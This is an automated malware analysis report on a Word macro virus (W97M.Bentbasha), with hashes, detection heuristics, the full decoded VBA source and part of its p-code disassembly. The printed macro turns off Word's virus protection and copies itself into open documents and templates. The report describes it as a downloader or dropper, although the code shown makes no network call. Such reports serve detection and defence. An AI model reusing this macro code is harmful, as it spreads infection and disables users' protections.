Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ed1a581077045dc…

MALICIOUS

Office (OLE)

29.5 KB Created: 2001-04-16 08:57:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: f8e71f0296cc32304d067e78e1ddc4b0 SHA-1: 347c371f8078b44f89d613681df498804d36c7fe SHA-256: 2ed1a581077045dc278710465ca35c98ec1357e40c141eee7b186cdcdc4ca303
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that executes code using the Shell() function. This macro attempts to export its code to 'c:\System.drv' and then execute 'notepad.exe' with a hardcoded message, indicating a downloader or dropper functionality. The ClamAV detection of 'Doc.Trojan.Jelo-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Jelo-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jelo-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4900 bytes
SHA-256: 843238e47a9c4802aad5a9fc2508299d9ba78798c7654a5f02accbf49fc7d4e7
Detection
ClamAV: Doc.Trojan.Jelo-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Bentbasha
Private Sub Document_New(): Document_Close: End Sub
Private Sub Document_Open(): Document_Close: End Sub
Private Sub Document_Close(): On Error Resume Next: c = c + 1
Word.Options.VirusProtection = False
Word.Application.EnableCancelKey = wdCancelDisabled
Word.ActiveDocument.ReadOnlyRecommended = False
Word.ShowVisualBasicEditor = False
If Dir("c:\Windows\Acaid32.drv") <> "Acaid32.drv" Then
Set vtijelo = ThisDocument.VBProject.VBComponents(c)
vtijelo.Export ("c:\System.drv")
End If
For t = 1 To Word.Documents.Count
Set f = Word.ActiveWindow.Document.VBProject.VBComponents(t).CodeModule
If f.lines(c, c) <> "'Bentbasha" Then
f.deletelines c, f.countoflines
f.AddFromFile "C:\System.drv"
f.deletelines 1, 4
End If
Next
For g = 1 To Word.Templates.Count
Set n = Templates(1).VBProject.VBComponents(1).CodeModule
If n.lines(1, 1) <> "'Bentbasha" Then
n.AddFromFile "c:\system.drv"
n.deletelines 1, 4
End If
Next
If Day(Now()) = 7 Then
app = Shell(notepad.exe, vbNormalFocus)
SendKeys "Nazalost, Vas kompjuter je inficiran sa W97M.Bentbasha by e[ax] / SpeciesVL!", 0
AppActivate (app)
End If
End Sub
'WM.Bentbasha by e[ax]


' Processing file: /opt/analyzer/scan_staging/fc8ae019179c43cb8cd3127ba33fc7e6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4725 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0009 "Bentbasha"
' Line #1:
' 	FuncDefn (Private Sub Document_New())
' 	BoS 0x0000 
' 	ArgsCall Document_Close 0x0000 
' 	BoS 0x0000 
' 	EndSub 
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	ArgsCall Document_Close 0x0000 
' 	BoS 0x0000 
' 	EndSub 
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' 	BoS 0x0000 
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	Ld c 
' 	LitDI2 0x0001 
' 	Add 
' 	St c 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Word 
' 	MemLd Options 
' 	MemSt VirusProtection 
' Line #5:
' 	Ld wdCancelDisabled 
' 	Ld Word 
' 	MemLd Application 
' 	MemSt EnableCancelKey 
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Word 
' 	MemLd ActiveDocument 
' 	MemSt ReadOnlyRecommended 
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Word 
' 	MemSt ShowVisualBasicEditor 
' Line #8:
' 	LitStr 0x0016 "c:\Windows\Acaid32.drv"
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x000B "Acaid32.drv"
' 	Ne 
' 	IfBlock 
' Line #9:
' 	SetStmt 
' 	Ld c 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set vtijelo 
' Line #10:
' 	LitStr 0x000D "c:\System.drv"
' 	Paren 
' 	Ld vtijelo 
' 	ArgsMemCall Export 0x0001 
' Line #11:
' 	EndIfBlock 
' Line #12:
' 	StartForVariable 
' 	Ld t 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Word 
' 	MemLd Documents 
' 	MemLd Count 
' 	For 
' Line #13:
' 	SetStmt 
' 	Ld t 
' 	Ld Word 
' 	MemLd ActiveWindow 
' 	MemLd Document 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set F 
' Line #14:
' 	Ld c 
' 	Ld c 
' 	Ld F 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x000A "'Bentbasha"
' 	Ne 
' 	IfBlock 
' Line #15:
' 	Ld c 
' 	Ld F 
' 	MemLd countoflines 
' 	Ld F 
' 	ArgsMemCall AddFromFile 0x0002 
' Line #16:
' 	LitStr 0x000D "C:\System.drv"
' 	Ld F 
' 	ArgsMemCall norm 0x0001 
' Line #17:
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	Ld F 
' 	ArgsMemCall AddFromFile 0x0002 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	StartForVariable 
' 	Next 
' Line #20:
' 	StartForVariable 
' 	Ld _B_var_g 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Word 
' 	MemLd n 
' 	MemLd Count 
' 	For 
' Line #21:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd n 0x0001 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set _B_var_n 
' Line #22:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld _B_var_n 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x000A "'Bentbasha"
' 	Ne 
' 	IfBlock 
' L
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.